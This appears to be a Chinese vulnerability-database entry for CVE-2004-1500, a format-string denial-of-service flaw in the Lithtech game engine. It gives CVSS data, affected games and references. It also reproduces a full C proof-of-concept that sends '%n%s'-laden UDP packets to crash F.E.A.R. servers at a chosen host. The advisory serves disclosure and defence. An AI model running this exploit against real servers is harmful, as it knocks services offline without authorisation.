CVE-2004-1500
CVSS2.1
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:55:14
NMCOES    

[原文]Format string vulnerability in the Lithtech engine, as used in multiple games, allows remote authenticated users to cause a denial of service (application crash) via format string specifiers in (1) a nickname or (2) a message.


[CNNVD]LithTech Engine格式串远程拒绝服务漏洞(CNNVD-200412-839)

        
        LithTech Engine是用于多个游戏软件的游戏引擎。
        LithTech Engine在处理昵称和其他信息时不正确处理外部输入,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        发送包含格式串字符的数据(如'%n%n%n')作为昵称或其他信息,可触发格式串问题,导致由于写任意内存地址而使服务程序崩溃。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:monolith_productions:global_operations:2.0
cpe:/a:monolith_productions:shogo:2.2
cpe:/a:monolith_productions:tron:2.0.1.42
cpe:/a:monolith_productions:kiss_psycho_circus:1.13
cpe:/a:monolith_productions:alien_versus_predator:2.1.0.9.6
cpe:/a:monolith_productions:no_one_lives_forever:2.1.3
cpe:/a:monolith_productions:blood:2.2.1
cpe:/a:monolith_productions:contract_jack:1.1
cpe:/a:monolith_productions:legends_of_might_and_magic:1.1
cpe:/a:freeform_interactive:purge_jihad:2.2.1
cpe:/a:monolith_productions:no_one_lives_forever:1.0.004
cpe:/a:monolith_productions:sanity:1.0
cpe:/a:monolith_productions:global_operations:2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1500
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1500
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-839
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/lithfs-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/lithfs-adv.txt
http://marc.info/?l=bugtraq&m=109969394601331&w=2
(UNKNOWN)  BUGTRAQ  20041105 In-game format string bug in the Lithtech engine
http://www.securityfocus.com/bid/11610
(UNKNOWN)  BID  11610
http://xforce.iss.net/xforce/xfdb/17972
(PATCH)  XF  lithtech-format-string(17972)

- 漏洞信息

LithTech Engine格式串远程拒绝服务漏洞
低危 输入验证
2004-12-31 00:00:00 2006-09-25 00:00:00
远程  
        
        LithTech Engine是用于多个游戏软件的游戏引擎。
        LithTech Engine在处理昵称和其他信息时不正确处理外部输入,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        发送包含格式串字符的数据(如'%n%n%n')作为昵称或其他信息,可触发格式串问题,导致由于写任意内存地址而使服务程序崩溃。
        

- 公告与补丁

        厂商补丁:
        Lithtech
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.lithtech.com/

- 漏洞信息 (24724)

Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities (EDBID:24724)
multiple remote
2004-11-05 Verified
0 Luigi Auriemma
N/A [点击下载]
source: http://www.securityfocus.com/bid/11610/info

Lithtech game engine is prone to multiple remote format-string vulnerabilities because of incorrect usage of 'printf()'-type functions. Format specifiers can be supplied directly to vulnerable functions from external data. 

A denial-of-service condition arises when a vulnerable server handles a malformed request. 

Exploiting these issues may also allow an attacker to write to arbitrary process memory and potentially execute code. Any code executed through this vulnerability could potentially run with the privileges of the server.

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        27888
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00" "\xff\x00\x00" 
"\x00"
#define FSTRING     "%n%s%n%s%n%s%n%s%n%s%n%s"
#define FEARFSPB1   "\xff\xff\xff\xff" "PB_Y" FSTRING
#define FEARFSPB2   "\xff\xff\xff\xff" "PB_U" "\xff\xff\xff\xff" \
                    "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" \
                    "127.0.0.1:1234;" FSTRING ";"




int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, 
int rear, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct 
sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            noquery = 0;
    u16     port    = PORT;
    u8      buff[8192];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "F.E.A.R. <= 1.08 format string exploitation through Punkbuster 
"VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- query server:\n");
    len = send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, buff, 
sizeof(buff), &peer, 0);
    if(len < 0) {
        printf("- no reply received, I try to continue\n");
        noquery = 1;
    } else {
        gs_handle_info(buff, len, 0, '\0',  5, 0, NULL);
    }

    sleep(ONESEC);
    printf("- send malformed packets\n");
    len = send_recv(sd, FEARFSPB1, sizeof(FEARFSPB1) - 1, NULL, 0, 
&peer, 1);
    len = send_recv(sd, FEARFSPB2, sizeof(FEARFSPB2) - 1, NULL, 0, 
&peer, 1);

    if(noquery) {
        printf("- the server should have been crashed, check it 
manually\n");
    } else {
        printf("- wait some seconds\n");
        sleep(ONESEC * 3);

        printf("- check server:\n");
        len = send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, buff, 
sizeof(buff), &peer, 0);
        if(len < 0) {
            printf("\n  Server IS vulnerable!!!\n");
        } else {
            printf("\n  Server doesn't seem vulnerable\n");
        }
    }

    close(sd);
    return(0);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, 
int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct 
sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, 
sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, 
sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


		

- 漏洞信息

11511
Lithtech Engine Multiple Game nickname Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-11-04 Unknow
2004-11-04 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities
Input Validation Error 11610
Yes No
2004-11-05 12:00:00 2007-10-01 10:59:00
Discovery of these issues is credited to Luigi Auriemma <aluigi@autistici.org>.

- 受影响的程序版本

Monolith Productions Tron 2.0 1.42
Monolith Productions Shogo 2.2
Monolith Productions Sanity 1.0
Monolith Productions Purge Jihad 2.2.1
Monolith Productions No One Lives Forever 2 1.3
Monolith Productions No One Lives Forever 1.0 .004
Monolith Productions Legends of Might and Magic 1.1
Monolith Productions Kiss Psycho Circus 1.13
Monolith Productions Global Operations 2.1
Monolith Productions Global Operations 2.0
Monolith Productions F.E.A.R. 1.0 2
Monolith Productions F.E.A.R. 1.0 1
Monolith Productions F.E.A.R. 1.08
Monolith Productions Contract Jack 1.1
Monolith Productions Blood 2 2.1
Monolith Productions Alien versus Predator 2 1.0.9 .6
Monolith Productions Purge Jihad 2.2.2

- 不受影响的程序版本

Monolith Productions Purge Jihad 2.2.2

- 漏洞讨论

Lithtech game engine is prone to multiple remote format-string vulnerabilities because of incorrect usage of 'printf()'-type functions. Format specifiers can be supplied directly to vulnerable functions from external data.

A denial-of-service condition arises when a vulnerable server handles a malformed request.

Exploiting these issues may also allow an attacker to write to arbitrary process memory and potentially execute code. Any code executed through this vulnerability could potentially run with the privileges of the server.

- 漏洞利用

The following proof-of-concept exploit is available:

- 解决方案

Reportedly, Purge Jihad 2.2.2 address this vulnerability. Please contact the vendor for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站